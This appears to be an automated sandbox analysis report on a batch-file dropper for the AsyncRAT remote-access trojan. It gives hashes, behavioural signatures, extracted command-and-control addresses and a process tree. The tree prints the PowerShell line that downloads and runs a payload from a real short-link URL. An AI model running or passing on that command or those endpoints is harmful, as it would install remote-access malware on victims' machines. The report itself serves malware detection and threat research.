Analysis
-
max time kernel
146s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29/10/2024, 23:30
Static task
static1
Behavioral task
behavioral1
Sample
file-ly5.bat
Resource
win7-20241010-en
General
-
Target
file-ly5.bat
-
Size
604B
-
MD5
a382e3f085e005edb9c5ea215109bb9b
-
SHA1
e7454672385b823bd0e26eaaf092aa9f04607429
-
SHA256
5b60f3dc0e0e96085cdddb8d8135eede32ccc9f0981996261a8cf27d4be2dbfb
-
SHA512
bee9a075e2acb3c47c24590e0b98a0949d5b7d6a86f017b0290304413bbac3b25e89ea8549a0be4fdfb88604ce6d950a151b3cd3370b71aefa9fbce3273a87ee
Malware Config
Extracted
https://u.to/nBL7IA
Extracted
asyncrat
Default
127.0.0.1:43655
excellent-waiver.gl.at.ply.gg:43655
tcp://gg123213123sadas-38622.portmap.host:43655
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x0008000000023ca5-24.dat family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 8 4948 powershell.exe 12 4948 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation file.exe -
Executes dropped EXE 2 IoCs
pid Process 2964 file.exe 632 Infected.exe -
pid Process 4948 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1948 PING.EXE 2792 PING.EXE -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2792 PING.EXE 1948 PING.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4948 powershell.exe 4948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4948 powershell.exe Token: SeDebugPrivilege 632 Infected.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 3212 wrote to memory of 4948 3212 cmd.exe 85 PID 3212 wrote to memory of 4948 3212 cmd.exe 85 PID 3212 wrote to memory of 2964 3212 cmd.exe 88 PID 3212 wrote to memory of 2964 3212 cmd.exe 88 PID 3212 wrote to memory of 1948 3212 cmd.exe 89 PID 3212 wrote to memory of 1948 3212 cmd.exe 89 PID 2964 wrote to memory of 632 2964 file.exe 91 PID 2964 wrote to memory of 632 2964 file.exe 91 PID 3212 wrote to memory of 2792 3212 cmd.exe 96 PID 3212 wrote to memory of 2792 3212 cmd.exe 96
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\file-ly5.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://u.to/nBL7IA', 'file.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Users\Admin\AppData\Local\Temp\file.exe"file.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
-
C:\Windows\system32\PING.EXEping localhost -n 32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1948
-
-
C:\Windows\system32\PING.EXEping localhost -n 32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2792
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63KB
MD529b38d4c415d9b464f1ff073e0a43913
SHA1ddf87b649f725c62ebd42914c71b2e446f1aeddf
SHA2566fd7acee70eef7574951bc9def49e41c2fde7aea50141672dcb1b2c79f510549
SHA5123f5801764e4c124c3b5cea11ddc3a79eb5cf37cb1bc50059ba2f9010200e717b36c726409595a1064dcf364eeb77fd801d8ef6ca73546a498e0dff5d9e668897
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
465KB
MD5d435bd69c788f8f42a73158ea2526716
SHA1dc640272ce6c4a1bf8487ab917fd175b034de7aa
SHA25698208142a545c388e0fc0efcf8a6b203673412c0510ab330c47337fa74bb4dc2
SHA512729200f3d1e30f90f81defb6e392a90d54509fdf55238971e7ba1df2663fb9f042490a8329bad5c02a8768e956d41d1180049414802f08a6974b35f03d953b62